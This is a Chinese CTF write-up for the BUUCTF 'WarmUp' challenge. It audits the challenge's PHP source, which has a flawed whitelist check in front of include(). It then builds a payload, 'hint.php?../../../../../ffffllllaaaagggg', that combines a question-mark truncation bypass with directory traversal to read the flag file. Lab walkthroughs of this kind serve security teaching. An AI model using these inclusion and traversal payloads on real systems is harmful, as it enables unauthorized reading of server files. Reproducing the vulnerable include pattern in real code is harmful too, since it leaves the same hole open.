buuctf之WarmUp

解题思路：

开题一张笑脸，无他，查看网页源码，看到提示source.php,在url后加/source.php,打开结果如下，

对source.php进行代码审计。

代码审计如下：

<?php
//对文件进行语法高亮显示
    highlight_file(__FILE__);

    //创建emmm类
    class emmm
    {
        //创建静态方法checkFile（）
        public static function checkFile(&$page)
        {
            //创建白名单数组、即只能是source.php或者hint.php
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

            //check变量是否不为null且为字符串
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }
            //check变量是否在白名单中
            if (in_array($page, $whitelist)) {
                return true;
            }
            //mb_substr()函数为返回字符串的一部分。在这里是从开始位置截取到mb_strpos()位置。
            $_page = mb_substr(
                $page,
                0,
                //mb_strpos (haystack ,needle )返回needle字符串在haystack中首次出现的位置
                mb_strpos($page . '?', '?')
            );
            //check变量_page是否在白名单里
            if (in_array($_page, $whitelist)) {
                return true;
            }
            //urldecode()函数是PHP中的内置函数，用于解码由encoded()函数编码的url
            $_page = urldecode($page);
            //从开始处截取到mb_strpos()处为止的字符串
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            //如果变量_page在白名单里，则返回true。
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
    //如果满足if条件，即file不为空且为字符串且checkFile（）返回true，则进行文件包含。
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

poc构造思路：

       通过代码审计，我们知道了需要满足三个条件，前两个为file不为空且为字符串，那么可以构造pyload为：/?file=xxx(xxx为字符串)。要满足第三个条件则只需要返回ture即可，可以构造poc为：source.php/?file=hint.php.（我们已经知道source.php文件源码是什么了，所以直接用hint.php即可）

结果如下：

提示：flag not here, and flag in ffffllllaaaagggg

构造poc：?file=ffffllllaaaagggg

结果如下：

到这里依然没有结果，其实很正常，因为ffffllllaaaagggg并不满足条件3，ffffllllaaaagggg不在白名单里。那我们就要想办法绕过白名单。结合已知条件，再次进行代码审计，寻找突破口。

            //mb_substr()函数为返回字符串的一部分。在这里是从开始位置截取到mb_strpos()位置。
            $_page = mb_substr(
                $page,
                0,
                //mb_strpos (haystack ,needle )返回needle字符串在haystack中首次出现的位置
                mb_strpos($page . '?', '?')
            );
            //check变量_page是否在白名单里
            if (in_array($_page, $whitelist)) {
                return true;
            }

我们已知，hint.php在白名单，flag在ffffllllaaaagggg，mb_strpos($page . '?', '?')返回了变量中？的位置，mb_substr（）则是从头截取到？位置的字符串，也就是说，截取后的$_page=hint.php即可。

那么，可构造poc：?file=hint.php?ffffllllaaaagggg,截取后的$_path为hint.php.可通过check。

结果如下：

还是不能打开flag，到这里可以肯定三个条件都满足， 没有找到又可能是flag文件不在当前目录。我们试着利用../到上层目录找找看。

poc：source.php?file=hint.php?../../../../../ffffllllaaaagggg

到此：得到flag